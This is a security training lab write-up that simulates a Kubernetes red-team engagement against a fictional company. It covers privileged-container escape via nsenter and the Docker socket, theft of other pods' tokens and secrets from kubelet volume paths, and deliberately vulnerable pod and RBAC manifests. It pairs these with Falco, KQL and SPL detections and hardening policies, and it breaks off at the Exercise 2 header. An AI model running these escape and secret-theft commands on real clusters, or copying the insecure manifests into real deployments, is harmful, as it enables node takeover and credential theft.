Lab 26: Container & Kubernetes Red Teaming¶

Chapters: 20 — Cloud Attack & Defense Playbook | 46 — Cloud & Container Red Teaming Difficulty: ⭐⭐⭐⭐ Expert Estimated Time: 4–5 hours Prerequisites: Chapter 20, Chapter 46, Lab 13 (Cloud Red Team), basic Docker/Kubernetes knowledge

Overview¶

In this lab you will:

Escape a privileged container to the underlying host node using capability abuse, nsenter, and mount exploitation — then pivot to access other pods' secrets
Exploit overly permissive Kubernetes RBAC bindings to escalate from a limited service account to cluster-admin privileges
Extract secrets directly from etcd on the control plane, decode them, and demonstrate why encryption at rest is critical
Attack an Istio service mesh by bypassing mTLS, hijacking traffic with VirtualService manipulation, and performing sidecar injection attacks
Compromise the CI/CD-to-cluster supply chain through vulnerable base images, trojanized containers, image pull policy abuse, and admission control bypass
Write KQL and SPL detection queries for every attack technique — both for cloud-native (AKS/EKS) audit logs and on-premise SIEM ingestion
Map all findings to MITRE ATT&CK techniques with defensive countermeasures

Synthetic Data Only

All data in this lab is 100% synthetic and fictional. All IP addresses use RFC 5737 (192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24) or RFC 1918 (10.0.0.0/8, 172.16.0.0/12) reserved ranges. All domains use *.example.com. No real applications, real credentials, or real infrastructure are referenced. All credentials shown as REDACTED. This lab is for defensive education only — never use these techniques against systems you do not own or without explicit written authorization.

Scenario¶

Engagement Brief — Helios Cloud Technologies

Organization: Helios Cloud Technologies (fictional) Platform: SkyForge — cloud-native microservices platform for enterprise data analytics Cluster: skyforge-prod.k8s.example.com (SYNTHETIC) Registry: registry.helios.example.com (SYNTHETIC) API Server: https://203.0.113.40:6443 (SYNTHETIC — RFC 5737) Node Network: 10.60.0.0/16 (SYNTHETIC) Pod Network: 10.244.0.0/16 (SYNTHETIC) Service Network: 10.96.0.0/12 (SYNTHETIC) Cloud Provider: AWS EKS (SYNTHETIC — Account ID 987654321098) Service Mesh: Istio 1.21 with mTLS enabled Engagement Type: Full-scope Kubernetes red team assessment Scope: All Kubernetes workloads, container runtime, RBAC configuration, etcd, service mesh, CI/CD pipeline, container registry Out of Scope: AWS control plane (IAM), DNS infrastructure, DDoS testing, physical infrastructure Test Window: 2026-04-07 08:00 – 2026-04-11 20:00 UTC Emergency Contact: soc@helios.example.com (SYNTHETIC)

Summary: Helios Cloud Technologies runs its SkyForge analytics platform on Kubernetes (AWS EKS) with Istio service mesh. Following a board-mandated security review after a competitor suffered a major container breakout incident, Helios has engaged your red team to simulate a realistic adversary with initial pod-level access. Your mission: escalate from a compromised application pod to full cluster compromise, demonstrating each attack path and the detection opportunities defenders have at every stage. The security team will use your findings to harden their Kubernetes posture, improve runtime monitoring, and validate their Falco rule coverage.

Certification Relevance¶

Certification Mapping

This lab maps to objectives in the following certifications:

Certification	Relevant Domains
CKS (Certified Kubernetes Security Specialist)	Cluster Setup (10%), System Hardening (15%), Minimize Microservice Vulnerabilities (20%), Supply Chain Security (20%), Monitoring/Logging/Runtime Security (20%)
OSCP / OSEP	Privilege escalation, lateral movement, container breakout
AWS Certified Security — Specialty (SCS-C02)	Domain 3: Infrastructure Protection, Domain 4: IAM
CompTIA PenTest+ (PT0-003)	Domain 3: Attacks and Exploits, Domain 4: Reporting and Communication
GIAC Cloud Penetration Tester (GCPN)	Container and orchestration attacks

MITRE ATT&CK Mapping¶

Throughout this lab, findings map to the following techniques:

Technique ID	Name	Tactic	Exercise
T1611	Escape to Host	Privilege Escalation	Exercise 1
T1610	Deploy Container	Execution	Exercise 2
T1078.004	Valid Accounts: Cloud Accounts	Persistence, Privilege Escalation	Exercise 2
T1552.007	Unsecured Credentials: Container API	Credential Access	Exercise 3
T1552.001	Unsecured Credentials: Credentials in Files	Credential Access	Exercise 3
T1557	Adversary-in-the-Middle	Collection	Exercise 4
T1071.001	Application Layer Protocol: Web Protocols	Command and Control	Exercise 4
T1195.002	Supply Chain Compromise: Compromise Software Supply Chain	Initial Access	Exercise 5
T1525	Implant Internal Image	Persistence	Exercise 5
T1613	Container and Resource Discovery	Discovery	Exercises 1–5

Prerequisites¶

Required Tools¶

Tool	Purpose	Version
kubectl	Kubernetes CLI	1.29+
docker	Container runtime	24.x+
minikube or kind	Local Kubernetes cluster	Latest
trivy	Container image vulnerability scanner	0.50+
falco	Runtime security monitoring	0.37+
kube-hunter	Kubernetes penetration testing	0.6+
peirates	Kubernetes post-exploitation tool	1.1+
helm	Kubernetes package manager	3.14+
istioctl	Istio service mesh CLI	1.21+
etcdctl	etcd CLI client	3.5+
jq	JSON parsing	1.7+
curl	HTTP requests	8.x+
nsenter	Namespace entry (Linux)	util-linux
crictl	Container runtime interface CLI	1.29+

Test Accounts (Synthetic)¶

Role	Username	Token	Namespace	Notes
Compromised App Pod	`data-processor-sa`	`REDACTED`	`skyforge-prod`	Initial foothold — limited SA
CI/CD Service Account	`deploy-pipeline-sa`	`REDACTED`	`skyforge-ci`	Deployment permissions
Monitoring Agent	`monitoring-sa`	`REDACTED`	`monitoring`	Read-only cluster-wide
Cluster Admin	`admin`	`REDACTED`	`*`	Full access (goal)
Auditor	`auditor`	`REDACTED`	`*`	Read-only (for validation)

Lab Environment Setup¶

# Create a local Kubernetes cluster with kind (SYNTHETIC)
# kind-config.yaml enables multiple nodes for realistic attack surface
$ cat <<'EOF' > kind-config.yaml
kind: Cluster
apiVersion: kind.x-k8s.io/v1alpha4
nodes:
  - role: control-plane
    extraMounts:
      - hostPath: /var/run/docker.sock
        containerPath: /var/run/docker.sock
  - role: worker
    extraPortMappings:
      - containerPort: 30080
        hostPort: 30080
  - role: worker
  - role: worker
EOF

$ kind create cluster --name skyforge-lab --config kind-config.yaml
Creating cluster "skyforge-lab" ...
 ✓ Ensuring node image (kindest/node:v1.29.2)
 ✓ Preparing nodes 📦 📦 📦 📦
 ✓ Writing configuration 📝
 ✓ Starting control-plane 🕹️
 ✓ Installing CNI 🔌
 ✓ Installing StorageClass 💾
 ✓ Joining worker nodes 🚜
Set kubectl context to "kind-skyforge-lab"

# Verify cluster is running
$ kubectl cluster-info --context kind-skyforge-lab
Kubernetes control plane is running at https://127.0.0.1:38291
CoreDNS is running at https://127.0.0.1:38291/api/v1/namespaces/kube-system/services/kube-dns:dns/proxy

# Create namespaces
$ kubectl create namespace skyforge-prod
namespace/skyforge-prod created

$ kubectl create namespace skyforge-ci
namespace/skyforge-ci created

$ kubectl create namespace monitoring
namespace/monitoring created

$ kubectl create namespace istio-system
namespace/istio-system created

$ kubectl create namespace skyforge-staging
namespace/skyforge-staging created

Deploy Lab Workloads (Synthetic)¶

# Deploy the vulnerable data-processor pod (initial foothold)
$ cat <<'EOF' | kubectl apply -f -
apiVersion: v1
kind: ServiceAccount
metadata:
  name: data-processor-sa
  namespace: skyforge-prod
---
apiVersion: v1
kind: Pod
metadata:
  name: data-processor
  namespace: skyforge-prod
  labels:
    app: data-processor
    version: v2.1.0
spec:
  serviceAccountName: data-processor-sa
  containers:
  - name: processor
    image: registry.helios.example.com/skyforge/data-processor:2.1.0
    securityContext:
      privileged: true
      capabilities:
        add: ["SYS_ADMIN", "SYS_PTRACE", "NET_ADMIN"]
    volumeMounts:
    - name: host-fs
      mountPath: /host
    - name: docker-sock
      mountPath: /var/run/docker.sock
    env:
    - name: DB_CONNECTION
      value: "postgresql://analytics:REDACTED@10.60.2.10:5432/skyforge"
    - name: REDIS_URL
      value: "redis://10.60.2.20:6379"
  volumes:
  - name: host-fs
    hostPath:
      path: /
  - name: docker-sock
    hostPath:
      path: /var/run/docker.sock
EOF
pod/data-processor created

# Deploy additional microservices
$ cat <<'EOF' | kubectl apply -f -
apiVersion: apps/v1
kind: Deployment
metadata:
  name: auth-service
  namespace: skyforge-prod
spec:
  replicas: 2
  selector:
    matchLabels:
      app: auth-service
  template:
    metadata:
      labels:
        app: auth-service
        version: v1.8.3
    spec:
      serviceAccountName: auth-service-sa
      containers:
      - name: auth
        image: registry.helios.example.com/skyforge/auth-service:1.8.3
        ports:
        - containerPort: 8080
        env:
        - name: JWT_SECRET
          valueFrom:
            secretKeyRef:
              name: auth-secrets
              key: jwt-secret
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: api-gateway
  namespace: skyforge-prod
spec:
  replicas: 3
  selector:
    matchLabels:
      app: api-gateway
  template:
    metadata:
      labels:
        app: api-gateway
        version: v3.2.1
    spec:
      containers:
      - name: gateway
        image: registry.helios.example.com/skyforge/api-gateway:3.2.1
        ports:
        - containerPort: 443
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: report-engine
  namespace: skyforge-prod
spec:
  replicas: 1
  selector:
    matchLabels:
      app: report-engine
  template:
    metadata:
      labels:
        app: report-engine
        version: v1.4.0
    spec:
      containers:
      - name: reports
        image: registry.helios.example.com/skyforge/report-engine:1.4.0
        ports:
        - containerPort: 8443
EOF
deployment.apps/auth-service created
deployment.apps/api-gateway created
deployment.apps/report-engine created

# Create secrets used by the workloads
$ kubectl create secret generic auth-secrets \
  --from-literal=jwt-secret=REDACTED \
  --from-literal=oauth-client-secret=REDACTED \
  -n skyforge-prod
secret/auth-secrets created

$ kubectl create secret generic db-credentials \
  --from-literal=username=skyforge_admin \
  --from-literal=password=REDACTED \
  --from-literal=connection-string="postgresql://skyforge_admin:REDACTED@10.60.2.10:5432/skyforge" \
  -n skyforge-prod
secret/db-credentials created

$ kubectl create secret generic tls-certs \
  --from-literal=tls.crt=REDACTED-CERTIFICATE-DATA \
  --from-literal=tls.key=REDACTED-PRIVATE-KEY-DATA \
  -n skyforge-prod
secret/tls-certs created

$ kubectl create secret generic registry-creds \
  --from-literal=.dockerconfigjson='{"auths":{"registry.helios.example.com":{"auth":"REDACTED"}}}' \
  --type=kubernetes.io/dockerconfigjson \
  -n skyforge-ci
secret/registry-creds created

Deploy Intentionally Vulnerable RBAC (Synthetic)¶

# Overly permissive ClusterRole — common misconfiguration
$ cat <<'EOF' | kubectl apply -f -
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: skyforge-developer
rules:
- apiGroups: [""]
  resources: ["pods", "pods/exec", "pods/log", "services", "configmaps"]
  verbs: ["get", "list", "watch", "create", "update", "patch", "delete"]
- apiGroups: [""]
  resources: ["secrets"]
  verbs: ["get", "list"]
- apiGroups: ["apps"]
  resources: ["deployments", "replicasets", "daemonsets"]
  verbs: ["get", "list", "watch", "create", "update", "patch", "delete"]
- apiGroups: ["rbac.authorization.k8s.io"]
  resources: ["clusterroles", "clusterrolebindings", "roles", "rolebindings"]
  verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: skyforge-developer-binding
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: skyforge-developer
subjects:
- kind: ServiceAccount
  name: data-processor-sa
  namespace: skyforge-prod
---
# Dangerous: CI/CD SA with escalation path
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: ci-deployer
rules:
- apiGroups: [""]
  resources: ["*"]
  verbs: ["*"]
- apiGroups: ["apps"]
  resources: ["*"]
  verbs: ["*"]
- apiGroups: ["rbac.authorization.k8s.io"]
  resources: ["*"]
  verbs: ["*"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: ci-deployer-binding
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: ci-deployer
subjects:
- kind: ServiceAccount
  name: deploy-pipeline-sa
  namespace: skyforge-ci
EOF
clusterrole.rbac.authorization.k8s.io/skyforge-developer created
clusterrolebinding.rbac.authorization.k8s.io/skyforge-developer-binding created
clusterrole.rbac.authorization.k8s.io/ci-deployer created
clusterrolebinding.rbac.authorization.k8s.io/ci-deployer-binding created

Lab Architecture (Synthetic)¶

┌───────────────────────────────────────────────────────────────────────────────────┐
│                  Helios Cloud — SkyForge Kubernetes Architecture                  │
│                                                                                   │
│  ┌─────────────────────────────────────────────────────────────────────────────┐  │
│  │                     AWS EKS Cluster (SYNTHETIC)                             │  │
│  │                     API Server: 203.0.113.40:6443                           │  │
│  │                     etcd: 203.0.113.41:2379                                 │  │
│  │                                                                             │  │
│  │  ┌─────────────────┐  ┌─────────────────┐  ┌─────────────────┐            │  │
│  │  │  Node 1          │  │  Node 2          │  │  Node 3          │            │  │
│  │  │  10.60.1.10      │  │  10.60.1.20      │  │  10.60.1.30      │            │  │
│  │  │                  │  │                  │  │                  │            │  │
│  │  │ ┌──────────────┐│  │ ┌──────────────┐│  │ ┌──────────────┐│            │  │
│  │  │ │data-processor││  │ │ auth-service  ││  │ │ report-engine││            │  │
│  │  │ │ (FOOTHOLD)   ││  │ │ (2 replicas) ││  │ │              ││            │  │
│  │  │ │ privileged:  ││  │ │              ││  │ │              ││            │  │
│  │  │ │  true        ││  │ └──────────────┘│  │ └──────────────┘│            │  │
│  │  │ └──────────────┘│  │ ┌──────────────┐│  │ ┌──────────────┐│            │  │
│  │  │ ┌──────────────┐│  │ │ api-gateway  ││  │ │ notif-svc    ││            │  │
│  │  │ │ analytics-   ││  │ │ (3 replicas) ││  │ │              ││            │  │
│  │  │ │ worker       ││  │ │              ││  │ │              ││            │  │
│  │  │ └──────────────┘│  │ └──────────────┘│  │ └──────────────┘│            │  │
│  │  └─────────────────┘  └─────────────────┘  └─────────────────┘            │  │
│  │                                                                             │  │
│  │  ┌─────────────────────────────────────────────────────┐                   │  │
│  │  │  Istio Service Mesh — mTLS enabled                   │                   │  │
│  │  │  istiod: 10.96.0.50 | ingress-gw: 203.0.113.42      │                   │  │
│  │  └─────────────────────────────────────────────────────┘                   │  │
│  │                                                                             │  │
│  │  ┌─────────────────────────────────────────────────────┐                   │  │
│  │  │  Data Services                                       │                   │  │
│  │  │  PostgreSQL: 10.60.2.10 | Redis: 10.60.2.20         │                   │  │
│  │  │  Kafka: 10.60.2.30     | Vault: 10.60.2.40          │                   │  │
│  │  │  etcd: 203.0.113.41:2379 (control plane)            │                   │  │
│  │  └─────────────────────────────────────────────────────┘                   │  │
│  └─────────────────────────────────────────────────────────────────────────────┘  │
│                                                                                   │
│  ┌───────────────────────┐  ┌────────────────────────┐  ┌──────────────────────┐ │
│  │ Container Registry     │  │ CI/CD Pipeline          │  │ Monitoring Stack     │ │
│  │ registry.helios        │  │ Jenkins: 10.60.3.10     │  │ Prometheus/Grafana   │ │
│  │ .example.com           │  │ ArgoCD: 10.60.3.20      │  │ Falco / Fluentd      │ │
│  └───────────────────────┘  └────────────────────────┘  └──────────────────────┘ │
└───────────────────────────────────────────────────────────────────────────────────┘

Exercise 1: Container Escape¶

Time Estimate: 60–75 minutes ATT&CK Mapping: T1611 (Escape to Host), T1613 (Container and Resource Discovery)

Objectives¶

Enumerate container capabilities, mounted volumes, and security context from inside a compromised pod
Identify host filesystem access via /proc/1/root and mounted hostPath volumes
Escape to the underlying host node using nsenter and capability exploitation
Access other pods' secrets and data from the host level
Understand the detection surface at every stage of the escape

Background¶

Container escape is one of the most critical attack paths in Kubernetes environments. When a pod runs with privileged: true or has SYS_ADMIN capability, the container's isolation boundary becomes paper-thin. An attacker who gains code execution inside such a pod can reach the underlying node, and from there, potentially the entire cluster.

In this exercise, you are simulating an attacker who has gained remote code execution inside the data-processor pod through a deserialization vulnerability in the analytics pipeline. The pod was deployed by a well-meaning SRE team who needed host-level access for performance monitoring — a common real-world misconfiguration.

Step 1.1: Initial Reconnaissance Inside the Pod¶

# You have a shell inside the compromised data-processor pod
# First: identify where you are and what you have

$ whoami
root

$ hostname
data-processor

$ cat /etc/os-release | head -3
PRETTY_NAME="Debian GNU/Linux 12 (bookworm)"
NAME="Debian GNU/Linux"
VERSION_ID="12"

Enumerate the Kubernetes environment:

# Check if this is a Kubernetes pod
$ env | grep -i kube
KUBERNETES_SERVICE_HOST=10.96.0.1
KUBERNETES_SERVICE_PORT=443
KUBERNETES_SERVICE_PORT_HTTPS=443

# Locate the service account token (auto-mounted)
$ ls -la /var/run/secrets/kubernetes.io/serviceaccount/
total 4
drwxrwxrwt 3 root root  140 Apr  7 08:15 .
drwxr-xr-x 3 root root 4096 Apr  7 08:15 ..
lrwxrwxrwx 1 root root   13 Apr  7 08:15 ca.crt -> ..data/ca.crt
lrwxrwxrwx 1 root root   16 Apr  7 08:15 namespace -> ..data/namespace
lrwxrwxrwx 1 root root   12 Apr  7 08:15 token -> ..data/token

$ cat /var/run/secrets/kubernetes.io/serviceaccount/namespace
skyforge-prod

# Store the token for later use
$ export TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
$ export CACERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
$ export APISERVER=https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT}

Step 1.2: Enumerate Container Capabilities¶

# Check if we're running as privileged
$ cat /proc/1/status | grep -i cap
CapInh: 0000003fffffffff
CapPrm: 0000003fffffffff
CapEff: 0000003fffffffff
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000

# Decode capabilities using capsh
$ capsh --decode=0000003fffffffff
0x0000003fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,
cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,
cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,
cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,
cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,
cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,
cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,
cap_wake_alarm,cap_block_suspend,cap_audit_read

Finding: Full Capabilities Enabled

The pod has all Linux capabilities including SYS_ADMIN, SYS_PTRACE, NET_ADMIN, and SYS_MODULE. This is equivalent to running as root on the host. Combined with privileged: true, this container has no meaningful isolation from the host kernel.

# Check security context — is this pod privileged?
$ cat /proc/1/cgroup
0::/system.slice/containerd.service

# Check if we can see host PID namespace
$ ls /proc/ | head -20
1
2
3
...
47
48
50
...

# Verify — can we see host processes? (privileged + hostPID would show them)
$ ps aux | head -10
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1   0.0  0.1  5340  3020 ?        Ss   08:15   0:00 /bin/sh -c python3 /app/processor.py
root        15   0.5  2.1 52340 42000 ?        Sl   08:15   0:12 python3 /app/processor.py
root        89   0.0  0.0  2388   696 pts/0    Ss   08:30   0:00 /bin/sh
root        95   0.0  0.0  7060  1580 pts/0    R+   08:31   0:00 ps aux

Step 1.3: Identify Mounted Volumes¶

# Enumerate mount points
$ mount | grep -E "(host|docker|containerd)"
/dev/sda1 on /host type ext4 (rw,relatime)
tmpfs on /var/run/docker.sock type tmpfs (rw,nosuid,nodev,noexec)

# The host root filesystem is mounted at /host!
$ ls /host/
bin   dev  home  lib    lib64  media  opt   root  sbin  srv  tmp  var
boot  etc  host  lib32  lost+found  mnt    proc  run   snap  sys  usr

# We also have the Docker socket
$ ls -la /var/run/docker.sock
srw-rw---- 1 root 998 0 Apr  7 08:00 /var/run/docker.sock

# Check /proc/1/root — can we reach the host init process?
$ ls /proc/1/root/
bin   dev  home  lib    lib64  media  opt   root  sbin  srv  tmp  var
boot  etc  host  lib32  lost+found  mnt    proc  run   snap  sys  usr

Finding: Host Filesystem Mounted

The host root filesystem (/) is mounted at /host with read-write permissions. The Docker socket is also mounted inside the container. These two misconfigurations together provide trivial host escape.

Step 1.4: Escape to Host Using nsenter¶

# Method 1: nsenter — enter host namespaces from the container
# This works because we have SYS_ADMIN + SYS_PTRACE capabilities

# EDUCATIONAL PSEUDOCODE — demonstrates the technique for defensive understanding
# nsenter targets PID 1 on the host (the init process)
$ nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash

# After nsenter, we are now operating in the HOST's namespace
$ hostname
ip-10-60-1-10.ec2.internal

$ whoami
root

$ cat /etc/hostname
ip-10-60-1-10.ec2.internal

# Verify we're on the host by checking for kubelet
$ ps aux | grep kubelet | head -3
root      1247  3.2  4.5 1987432 91240 ?     Ssl  08:00   0:45 /usr/bin/kubelet \
  --config=/var/lib/kubelet/config.yaml \
  --container-runtime-endpoint=unix:///run/containerd/containerd.sock \
  --kubeconfig=/etc/kubernetes/kubelet.conf \
  --node-ip=10.60.1.10 \
  --v=2

# We have escaped the container and are now root on the node!
$ id
uid=0(root) gid=0(root) groups=0(root)

Critical: Container Escape Achieved

Using nsenter targeting PID 1 with --mount --uts --ipc --net --pid flags, the attacker enters the host's namespaces. This is the canonical privileged container escape. From here, the attacker has root access to the Kubernetes node.

Step 1.5: Pivot from Host to Other Pods' Secrets¶

# Now on the host node — enumerate all containers running on this node
$ crictl ps
CONTAINER       IMAGE           CREATED         STATE     NAME             POD ID
a1b2c3d4e5f6    registry...     2 hours ago     Running   data-processor   f1e2d3c4b5
b2c3d4e5f6a1    registry...     2 hours ago     Running   analytics-worker g2f3e4d5c6
c3d4e5f6a1b2    registry...     2 hours ago     Running   auth-service     h3g4f5e6d7

# Inspect another pod's filesystem
$ crictl inspect b2c3d4e5f6a1 | jq '.info.runtimeSpec.mounts[] | select(.destination | contains("secret"))'
{
  "destination": "/var/run/secrets/kubernetes.io/serviceaccount",
  "type": "bind",
  "source": "/var/lib/kubelet/pods/g2f3e4d5c6/volumes/kubernetes.io~projected/kube-api-access-xxxxx",
  "options": ["rbind", "rprivate", "ro"]
}

# Read another pod's service account token
$ cat /var/lib/kubelet/pods/g2f3e4d5c6/volumes/kubernetes.io~projected/kube-api-access-xxxxx/token
eyJhbGciOiJSUzI1NiIsImtpZCI6InN5bnRoZXRpYy1rZXkifQ.SYNTHETIC_TOKEN_ANALYTICS_WORKER.REDACTED_SIGNATURE

# Access another pod's environment variables (may contain secrets)
$ crictl inspect b2c3d4e5f6a1 | jq '.info.runtimeSpec.process.env[]' | grep -i -E "(pass|secret|key|token)"
"DB_PASSWORD=REDACTED"
"API_KEY=REDACTED"
"ANALYTICS_TOKEN=REDACTED"

# Read mounted secret volumes from other pods
$ find /var/lib/kubelet/pods/ -path "*/secrets/*" -type f 2>/dev/null
/var/lib/kubelet/pods/g2f3e4d5c6/volumes/kubernetes.io~secret/db-creds/username
/var/lib/kubelet/pods/g2f3e4d5c6/volumes/kubernetes.io~secret/db-creds/password
/var/lib/kubelet/pods/h3g4f5e6d7/volumes/kubernetes.io~secret/auth-secrets/jwt-secret
/var/lib/kubelet/pods/h3g4f5e6d7/volumes/kubernetes.io~secret/auth-secrets/oauth-client-secret

$ cat /var/lib/kubelet/pods/h3g4f5e6d7/volumes/kubernetes.io~secret/auth-secrets/jwt-secret
REDACTED

Finding: Cross-Pod Secret Theft via Host Access

After escaping to the host, all pod secrets on that node are accessible via the kubelet's local volume mounts. This is because Kubernetes mounts secret volumes as tmpfs directories on the node filesystem, readable by root. This demonstrates why node compromise = compromise of all workloads on that node.

Step 1.6: Alternative Escape — Docker Socket¶

# Method 2: Docker socket escape (if mounted)
# Back inside the original container

# EDUCATIONAL PSEUDOCODE — demonstrates the technique for defensive understanding
# Use the mounted Docker socket to create a privileged container on the host
$ docker -H unix:///var/run/docker.sock run -it --privileged \
  --net=host --pid=host --ipc=host \
  -v /:/host \
  registry.helios.example.com/skyforge/base-image:latest \
  chroot /host /bin/bash

# This creates a new container with host namespace access
# effectively giving a root shell on the host

Detection: Container Escape¶

Falco Rules¶

# Falco rule: Detect nsenter execution (container escape indicator)
- rule: Container Escape via nsenter
  desc: Detects nsenter being used from within a container to enter host namespaces
  condition: >
    spawned_process and container and proc.name = "nsenter"
    and proc.args contains "--target 1"
  output: >
    nsenter executed inside container targeting host PID namespace
    (user=%user.name container=%container.name image=%container.image.repository
     command=%proc.cmdline pod=%k8s.pod.name ns=%k8s.ns.name)
  priority: CRITICAL
  tags: [container, escape, T1611]

# Falco rule: Detect Docker socket access from container
- rule: Docker Socket Accessed from Container
  desc: A process inside a container accessed the Docker socket
  condition: >
    container and (fd.name = /var/run/docker.sock or
    fd.name = /run/docker.sock) and
    evt.type in (connect, sendto)
  output: >
    Docker socket accessed from container
    (user=%user.name container=%container.name command=%proc.cmdline
     pod=%k8s.pod.name ns=%k8s.ns.name)
  priority: CRITICAL
  tags: [container, escape, docker_socket]

# Falco rule: Detect host filesystem read from container
- rule: Sensitive Host Path Read from Container
  desc: Container process reading sensitive host paths via mounted volumes
  condition: >
    container and open_read and
    (fd.name startswith /host/etc/ or
     fd.name startswith /host/var/lib/kubelet/ or
     fd.name startswith /host/root/)
  output: >
    Sensitive host path accessed from container
    (file=%fd.name user=%user.name container=%container.name
     command=%proc.cmdline pod=%k8s.pod.name)
  priority: HIGH
  tags: [container, file_access, host_path]

# Falco rule: Detect chroot from container
- rule: Chroot Detected in Container
  desc: chroot called from within a container — potential escape attempt
  condition: >
    container and evt.type = chroot
  output: >
    chroot detected in container (user=%user.name container=%container.name
     command=%proc.cmdline pod=%k8s.pod.name ns=%k8s.ns.name)
  priority: CRITICAL
  tags: [container, escape, chroot]

KQL Detection (Azure Kubernetes Service / Sentinel)¶

// KQL: Detect privileged container creation in AKS
AzureDiagnostics
| where Category == "kube-audit"
| where log_s has "create" and log_s has "pods"
| extend AuditLog = parse_json(log_s)
| extend PodSpec = AuditLog.requestObject.spec
| where PodSpec.containers[0].securityContext.privileged == true
    or PodSpec.containers[0].securityContext.capabilities.add has "SYS_ADMIN"
| project TimeGenerated,
    User = AuditLog.user.username,
    Namespace = AuditLog.objectRef.namespace,
    PodName = AuditLog.objectRef.name,
    Privileged = PodSpec.containers[0].securityContext.privileged,
    Capabilities = PodSpec.containers[0].securityContext.capabilities
| sort by TimeGenerated desc

// KQL: Detect nsenter or chroot execution via container audit
ContainerLog
| where LogEntry has_any ("nsenter", "chroot /host", "mount --bind")
| extend ContainerID = ContainerID,
    PodName = extract("pod_name=([\\w-]+)", 1, LogEntry),
    Command = extract("command=(.+)", 1, LogEntry)
| project TimeGenerated, PodName, ContainerID, Command, LogEntry
| sort by TimeGenerated desc

// KQL: Detect hostPath volume mounts in pod creation
AzureDiagnostics
| where Category == "kube-audit"
| where log_s has "create" and log_s has "pods"
| extend AuditLog = parse_json(log_s)
| extend Volumes = AuditLog.requestObject.spec.volumes
| mv-expand Volume = Volumes
| where isnotempty(Volume.hostPath)
| project TimeGenerated,
    User = AuditLog.user.username,
    Namespace = AuditLog.objectRef.namespace,
    PodName = AuditLog.objectRef.name,
    HostPath = Volume.hostPath.path,
    MountType = Volume.hostPath.type
| sort by TimeGenerated desc

SPL Detection (Splunk)¶

// SPL: Detect privileged container creation
index=kubernetes sourcetype="kube:audit"
  verb=create objectRef.resource=pods
| spath "requestObject.spec.containers{}.securityContext.privileged" as privileged
| spath "requestObject.spec.containers{}.securityContext.capabilities.add{}" as capabilities
| where privileged="true" OR capabilities="SYS_ADMIN"
| table _time, user.username, objectRef.namespace, objectRef.name, privileged, capabilities

// SPL: Detect container escape tools
index=kubernetes sourcetype="kube:container-logs"
| search "nsenter" OR "chroot /host" OR "/proc/1/root" OR "docker.sock"
| eval severity="CRITICAL"
| table _time, pod_name, namespace, container_name, log, severity

// SPL: Detect hostPath volume mounts
index=kubernetes sourcetype="kube:audit"
  verb=create objectRef.resource=pods
| spath "requestObject.spec.volumes{}.hostPath.path" as host_path
| where isnotnull(host_path)
| eval risk=case(
    host_path="/", "CRITICAL",
    host_path="/var/run/docker.sock", "CRITICAL",
    host_path="/etc", "HIGH",
    host_path="/var/log", "MEDIUM",
    1=1, "LOW"
  )
| table _time, user.username, objectRef.namespace, objectRef.name, host_path, risk
| sort -risk

Defensive Measures: Preventing Container Escape¶

Prevention Controls

1. Pod Security Standards (PSS)

Enforce the restricted Pod Security Standard at the namespace level:

apiVersion: v1
kind: Namespace
metadata:
  name: skyforge-prod
  labels:
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/audit: restricted
    pod-security.kubernetes.io/warn: restricted

2. Deny Privileged Containers (OPA/Gatekeeper)

apiVersion: constraints.gatekeeper.sh/v1beta1
kind: K8sPSPPrivilegedContainer
metadata:
  name: deny-privileged
spec:
  match:
    kinds:
    - apiGroups: [""]
      kinds: ["Pod"]
    excludedNamespaces: ["kube-system"]

3. Drop All Capabilities

securityContext:
  runAsNonRoot: true
  runAsUser: 65534
  allowPrivilegeEscalation: false
  readOnlyRootFilesystem: true
  capabilities:
    drop:
      - ALL

4. Deny hostPath Volumes (OPA/Gatekeeper)

apiVersion: constraints.gatekeeper.sh/v1beta1
kind: K8sPSPHostFilesystem
metadata:
  name: deny-host-filesystem
spec:
  match:
    kinds:
    - apiGroups: [""]
      kinds: ["Pod"]
  parameters:
    allowedHostPaths: []  # No hostPath volumes allowed

5. Deny Docker Socket Mounts

apiVersion: constraints.gatekeeper.sh/v1beta1
kind: K8sPSPHostFilesystem
metadata:
  name: deny-docker-socket
spec:
  match:
    kinds:
    - apiGroups: [""]
      kinds: ["Pod"]
  parameters:
    allowedHostPaths:
    - pathPrefix: "/var/log"
      readOnly: true
    # /var/run/docker.sock is NOT listed — blocked by default

6. Enable Falco Runtime Monitoring

Deploy Falco as a DaemonSet with the container escape rules from this exercise.

Exercise 1 Summary¶

Step	Action	Finding	Severity
1.1	Pod enumeration	Full capabilities + root user	Critical
1.2	Capability analysis	SYS_ADMIN + 37 other capabilities	Critical
1.3	Volume enumeration	Host root FS + Docker socket mounted	Critical
1.4	nsenter escape	Root shell on host node	Critical
1.5	Cross-pod pivot	All pod secrets on node accessible	Critical
1.6	Docker socket escape	Alternative escape path confirmed	Critical

Exercise 2: RBAC Exploitation & Privilege Escalation¶

